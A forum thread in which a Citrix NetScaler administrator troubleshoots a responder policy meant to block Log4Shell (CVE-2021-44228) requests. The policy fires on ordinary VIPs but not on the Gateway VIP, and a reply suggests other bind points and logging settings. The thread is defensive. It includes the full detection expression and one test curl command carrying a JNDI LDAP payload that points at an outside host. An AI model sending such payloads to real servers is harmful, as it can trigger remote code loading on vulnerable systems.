Citrix responder policy for Citrix Security Advisory for Apache CVE-2021-44228 seems to work on VIP, but not Gateway VIP


Josh Slaney

Citrix released a responder policy for CVE-2021-44228 to drop traffic globally: https://support.citrix.com/article/CTX335705. I have configured the policy on several NetScalers and applied it to the default global policy for HTTP. I am seeing the policy hits increment when I send a curl request to any standard VIP (SSL or HTTP protocol) mimicking the exploit. Example: "curl -k --user-agent ${jndi:ldap://myserver.com/payload1} https://x.x.x.x"

However, when I test the same example against a Citrix Gateway virtual server VIP (SSL protocol), the policy hit count does not increment. This leads me to believe that it is not working at the Gateway VIP level. Has anyone else seen this? Is there something wrong with my testing methodology? I have tested manually binding the policy as a responder policy on the Gateway VIP instead of the global bind point, and it's still not blocking.

 

The config on the NetScaler looks like this:

add policy patset patset_cve_2021_44228
bind policy patset patset_cve_2021_44228 ldap -index 2
bind policy patset patset_cve_2021_44228 http -index 3
bind policy patset patset_cve_2021_44228 https -index 4
bind policy patset patset_cve_2021_44228 ldaps -index 5
bind policy patset patset_cve_2021_44228 rmi -index 6
bind policy patset patset_cve_2021_44228 dns -index 7
add audit messageaction CVE-2021-44228_Block_Alert ALERT "\"Netscaler CVE-2021-44228 Apache Log4j Block - VIP:\"+HTTP.REQ.LB_VSERVER.NAME+\" Client IP:\"+CLIENT.IP.SRC+\" X-forwarded-For:\"+HTTP.REQ.HEADER(\"X-Forwarded-For\")+\" issued a \"+HTTP.REQ.METHOD+\" for \"+HTTP.REQ.HEADER(\"Host\")+\"\"+HTTP.REQ.URL.HTTP_URL_SAFE+\"\""
add responder policy mitigate_cve_2021_44228 "HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\")" DROP -logAction CVE-2021-44228_Block_Alert
bind responder global mitigate_cve_2021_44228 100 END -type REQ_DEFAULT

 

I'm trying to understand where this policy will really be effective. It definitely appears to be working at the VIP level.


I have bound this policy at the default global level for the HTTP protocol.

I have also tried binding it to the Gateway VIP's responder policy bind point, and it doesn't seem to work there the way it does at the VIP level.

 

Is there a way to log all of the HTTP headers with the message action I've applied?  My current message action looks like this:

 

add audit messageaction CVE-2021-44228_Block_Alert ALERT "\"Netscaler CVE-2021-44228 Apache Log4j Block - VIP:\"+HTTP.REQ.LB_VSERVER.NAME+\" Client IP:\"+CLIENT.IP.SRC+\" X-forwarded-For:\"+HTTP.REQ.HEADER(\"X-Forwarded-For\")+\" issued a \"+HTTP.REQ.METHOD+\" for \"+HTTP.REQ.HEADER(\"Host\")+\"\"+HTTP.REQ.URL.HTTP_URL_SAFE+\"\""

 

I think I'm seeing some other legitimate traffic hit these policies internally. I need to figure out why they are matching on it, and the only way I'll know is if I log all the headers of the requests.

 


VPN flows vs. regular traffic might be different. If your Gateway is integrated with AAA, you can bind the responder policy to the AAA responder bind point (on the AAA vserver only), and responder will run BEFORE authentication attempts. If there is no AAA, then you can bind to the VPN vserver itself.

 

If you want to log all policy hits, set the audit action in the responder policy AND enable "User configurable log messages" in syslog so that the custom log messages show up (and include the logging level you specified in the message action).

 

I don't know what you mean by:

1 hour ago, Josh Slaney said:

and the only way I'll know is if I log all the headers of the requests.

 

Do you want to log all requests, or all headers?

For all headers, try http.req.full_header, maybe.

 

